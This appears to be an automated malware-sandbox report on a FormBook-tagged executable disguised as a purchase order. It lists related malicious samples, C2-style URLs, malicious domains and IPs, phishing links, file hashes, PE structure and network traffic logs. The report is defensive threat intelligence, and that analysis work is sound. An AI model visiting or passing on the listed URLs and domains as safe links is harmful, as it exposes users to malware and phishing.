                                                                        • www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
                                                                        PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                                        • www.carfactsandfigures.com/gpc9/?pfD=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoQOkRQ9xiXX9HyxRaD3/mCeI&28=XrcXTyOAOYd9aU4
                                                                        Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                                        • www.carfactsandfigures.com/gpc9/?Qw=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoWCpUiVji2f5FixRaDjUrieI&Cq=oXbgvbGl
                                                                        Zpe3AgLpIk.exeGet hashmaliciousFormBookBrowse
                                                                        • www.detail.tips/ug0e/?g3=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmn4WmFlEKCSmNHQ==&aRz=TnxvzmvvZHhQa
                                                                        cOqo5PZFXC.exeGet hashmaliciousFormBookBrowse
                                                                        • www.detail.tips/ug0e/?T6N6=/sYbaCMyVKUweyZqxZmWwv4r7cKEdyFMx5i/AVkPxJXLdrztci0N39LYxFfcAnRsf0n5uCI95iaxL3pmdgVmzfuiO2sKUmKBQ8Ki8GsnQXiV&a23=vQfnLmKSaoS

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.nesmalt.infoHSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 66.29.155.54
                                                                        HSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 66.29.155.54
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • 66.29.155.54
                                                                        pPi18YXmEM.exeGet hashmaliciousFormBookBrowse
                                                                        • 66.29.155.54
                                                                        TNT_Invoice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 66.29.155.54
                                                                        HSBC_Payment_Adice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 66.29.155.54
                                                                        SecuriteInfo.com.Win32.DropperX-gen.20545.21398.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 66.29.155.54
                                                                        www.611erhm.topHSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.149.198.43
                                                                        HSBC_Payment_Advice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.117.26.57
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.149.198.43
                                                                        pPi18YXmEM.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.149.198.43
                                                                        TNT_Invoice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.149.198.43
                                                                        HSBC_Payment_Adice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.117.26.57
                                                                        Order_ID_DHL_0901P55AL.exeGet hashmaliciousFormBookBrowse
                                                                        • 34.149.198.43
                                                                        www.makeinai.onlinePO_REGSEW4298.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.140.192.89
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.140.192.89
                                                                        PAYNOW_2023_08_002783pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.140.192.187
                                                                        rPRESSUREREDUCINGVALVE_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.140.192.187

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        SS-ASHUSPO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                        • 131.153.147.90
                                                                        Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.148.82
                                                                        Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.148.82
                                                                        Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231128_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.148.82
                                                                        https://tracking.solutiondynamics.com/?ApplicationId=SASES;cid=WRC&eid=65836714&jid=71771&event=clicked&ref=UpdateDetails&ref2=04361/434/00D&dest=http://livingbythestream.com/css/style/hguh1k/bruna.hom@uvic.catGet hashmaliciousHTMLPhisherBrowse
                                                                        • 131.153.44.120
                                                                        Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.148.82
                                                                        Hesap_Hareketleri_SUN_BAGLANTI_ELEMANLARI_PRES_METMAKSANVE_TICLTDSTI_20231124_84014609_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.148.82
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • 131.153.147.90
                                                                        file.exeGet hashmaliciousBazaLoaderBrowse
                                                                        • 131.153.152.122
                                                                        SecuriteInfo.com.Win32.TrojanX-gen.24405.26677.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.100.231
                                                                        https://drive.google.com/file/d/11qmYm6lCQxQsYSNvVMa92eUR4AcCAhCn/previewGet hashmaliciousUnknownBrowse
                                                                        • 198.24.171.52
                                                                        Quote#2310303384.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 131.153.100.231
                                                                        https://freefireenewgames.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 131.153.148.28
                                                                        https://freenetflixxaccontcom.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                                        • 23.235.251.211
                                                                        https://allezlens.fr/Get hashmaliciousUnknownBrowse
                                                                        • 131.153.148.26
                                                                        Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                        • 131.153.147.186
                                                                        Food_Inquiry.exeGet hashmaliciousUnknownBrowse
                                                                        • 131.153.147.186
                                                                        https://komposty.cz/.dps/index/myaccount/Get hashmaliciousUnknownBrowse
                                                                        • 131.153.242.59
                                                                        njvmboDs7W.exeGet hashmaliciousAmadey, Glupteba, RHADAMANTHYS, RedLineBrowse
                                                                        • 131.153.147.42
                                                                        temp.vbsGet hashmaliciousUnknownBrowse
                                                                        • 131.153.147.162
                                                                        TRANSIP-ASAmsterdamtheNetherlandsNLPO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 37.97.254.27
                                                                        Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.97.254.27
                                                                        PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.97.254.27
                                                                        PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                        • 37.97.254.27
                                                                        file.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        kTnqWHyjjG.elfGet hashmaliciousMiraiBrowse
                                                                        • 95.170.75.142
                                                                        Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 37.97.254.27
                                                                        ZenY9BAc8B.elfGet hashmaliciousMiraiBrowse
                                                                        • 185.211.251.125
                                                                        F00D0B21M4.elfGet hashmaliciousMiraiBrowse
                                                                        • 37.97.214.109
                                                                        INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        QISOVbNi9M.elfGet hashmaliciousMiraiBrowse
                                                                        • 95.170.75.168
                                                                        NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 37.97.254.27
                                                                        003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                        • 37.97.254.27
                                                                        Document.exeGet hashmaliciousFormBookBrowse
                                                                        • 37.97.254.27
                                                                        ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                        • 95.170.75.197
                                                                        sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                        • 149.210.216.118
                                                                        RF_-_ORDER_8990387_REQUEST.exeGet hashmaliciousFormBookBrowse
                                                                        • 86.105.245.69

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_YTWHDF3432.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\PO_YTWHDF3432.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                        C:\Users\user\AppData\Local\Temp\7e327r58

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\isoburn.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                        Category:dropped
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.1211596417522893
                                                                        Encrypted:false
                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.353704637538297
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:PO_YTWHDF3432.exe
                                                                        File size:956'928 bytes
                                                                        MD5:0bc4df2daa2bea193866307038113708
                                                                        SHA1:7d90b61cfb0f9c54d301bb8ee6af650606efe862
                                                                        SHA256:bf7c1a1fdf3903e051dcc7136e63e73ddc16e07c00d87553db63f4b7eadcb14e
                                                                        SHA512:aeda45e08d5d68e07ef74691a80aa3fe006d63f2e39b594882ff053e8a456d1083de5d6caa6f150e099c9d8756241460a1ee197ee050bc909f2d93758ec13b60
                                                                        SSDEEP:12288:fswTVr8xmHiJ8FfU65O8bVeW6acxe+h68aQ2H3XTbKQ5eHCd:UwpAUCJ8Rvbb6aTWEn/eH
                                                                        TLSH:05157ED1B1508D9AED6B0AF26C2BA53025E37E9D54A4C10C5A9EB75736F3302209FE1F
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Q...............0..............(... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:aea4accc16a3d9be

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4a282e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x8451EF9E [Mon May 7 00:11:10 2040 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        inc ecx
                                                                        inc ebp
                                                                        aaa
                                                                        aaa
                                                                        pop ecx
                                                                        xor eax, 3537355Ah
                                                                        xor al, 38h
                                                                        inc esi
                                                                        push esi
                                                                        inc edi
                                                                        xor ecx, dword ptr [edx+35h]
                                                                        pop eax
                                                                        inc ebp
                                                                        xor eax, 00000034h
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa27dc0x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x48b20.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9fefc0x70.text
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xa084c0xa0a00False0.9255122203307393data7.9060088345737976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xa40000x48b200x48c00False0.06338930949312714data4.769396222171235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xee0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xa42e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.1798780487804878
                                                                        RT_ICON0xa49480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2513440860215054
                                                                        RT_ICON0xa4c300x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.3918918918918919
                                                                        RT_ICON0xa4d580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3200959488272921
                                                                        RT_ICON0xa5c000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.33664259927797835
                                                                        RT_ICON0xa64a80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.2622832369942196
                                                                        RT_ICON0xa6a100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.04393141403083114
                                                                        RT_ICON0xe8a380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.18786307053941909
                                                                        RT_ICON0xeafe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.2453095684803002
                                                                        RT_ICON0xec0880x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3484042553191489
                                                                        RT_GROUP_ICON0xec4f00x92data0.5753424657534246
                                                                        RT_VERSION0xec5840x3aedata0.4171974522292994
                                                                        RT_MANIFEST0xec9340x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 2, 2023 18:48:39.182090044 CET4971180192.168.2.10162.222.226.77
                                                                        Dec 2, 2023 18:48:39.371028900 CET8049711162.222.226.77192.168.2.10
                                                                        Dec 2, 2023 18:48:39.371113062 CET4971180192.168.2.10162.222.226.77
                                                                        Dec 2, 2023 18:48:39.371944904 CET4971180192.168.2.10162.222.226.77
                                                                        Dec 2, 2023 18:48:39.560796976 CET8049711162.222.226.77192.168.2.10
                                                                        Dec 2, 2023 18:48:39.566896915 CET8049711162.222.226.77192.168.2.10
                                                                        Dec 2, 2023 18:48:39.566916943 CET8049711162.222.226.77192.168.2.10
                                                                        Dec 2, 2023 18:48:39.567099094 CET4971180192.168.2.10162.222.226.77
                                                                        Dec 2, 2023 18:48:39.567847013 CET4971180192.168.2.10162.222.226.77
                                                                        Dec 2, 2023 18:48:39.756620884 CET8049711162.222.226.77192.168.2.10
                                                                        Dec 2, 2023 18:48:55.570303917 CET4971280192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:55.706140995 CET804971274.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:55.706209898 CET4971280192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:55.706455946 CET4971280192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:55.842297077 CET804971274.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:55.845355034 CET804971274.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:55.845381021 CET804971274.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:55.845531940 CET4971280192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:57.211591005 CET4971280192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:58.227579117 CET4971380192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:58.360553980 CET804971374.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:58.360692978 CET4971380192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:58.360888958 CET4971380192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:58.493762970 CET804971374.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:58.498862028 CET804971374.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:58.498877048 CET804971374.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:48:58.498941898 CET4971380192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:48:59.868144035 CET4971380192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:00.884008884 CET4971480192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:01.020437002 CET804971474.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:01.020558119 CET4971480192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:01.020860910 CET4971480192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:01.156678915 CET804971474.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:01.156699896 CET804971474.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:01.160701990 CET804971474.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:01.160716057 CET804971474.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:01.160787106 CET4971480192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:02.524302959 CET4971480192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:03.540154934 CET4971580192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:03.673223019 CET804971574.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:03.673522949 CET4971580192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:03.673619032 CET4971580192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:03.806575060 CET804971574.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:03.809576988 CET804971574.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:03.809837103 CET804971574.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:03.809984922 CET4971580192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:03.809984922 CET4971580192.168.2.1074.208.236.181
                                                                        Dec 2, 2023 18:49:03.943305969 CET804971574.208.236.181192.168.2.10
                                                                        Dec 2, 2023 18:49:09.038269043 CET4971680192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:09.168795109 CET8049716172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:09.168966055 CET4971680192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:09.169353008 CET4971680192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:09.299556017 CET8049716172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:10.680310965 CET4971680192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:10.811466932 CET8049716172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:10.811585903 CET4971680192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:11.696892977 CET4971780192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:11.826152086 CET8049717172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:11.826292038 CET4971780192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:11.826541901 CET4971780192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:11.955590963 CET8049717172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:13.336956978 CET4971780192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:13.467106104 CET8049717172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:13.467190027 CET4971780192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:14.352675915 CET4971980192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:14.481470108 CET8049719172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:14.481568098 CET4971980192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:14.481858969 CET4971980192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:14.610630989 CET8049719172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:14.610656023 CET8049719172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:15.992782116 CET4971980192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:16.123259068 CET8049719172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:16.123351097 CET4971980192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:17.008861065 CET4972080192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:17.138725042 CET8049720172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:17.138859034 CET4972080192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:17.139161110 CET4972080192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:17.269001961 CET8049720172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:47.750078917 CET8049720172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:47.750375986 CET8049720172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:47.750459909 CET4972080192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:47.750763893 CET4972080192.168.2.10172.67.184.73
                                                                        Dec 2, 2023 18:49:47.880481005 CET8049720172.67.184.73192.168.2.10
                                                                        Dec 2, 2023 18:49:53.337748051 CET4972180192.168.2.1037.140.192.89
                                                                        Dec 2, 2023 18:49:53.556484938 CET804972137.140.192.89192.168.2.10
                                                                        Dec 2, 2023 18:49:53.556695938 CET4972180192.168.2.1037.140.192.89
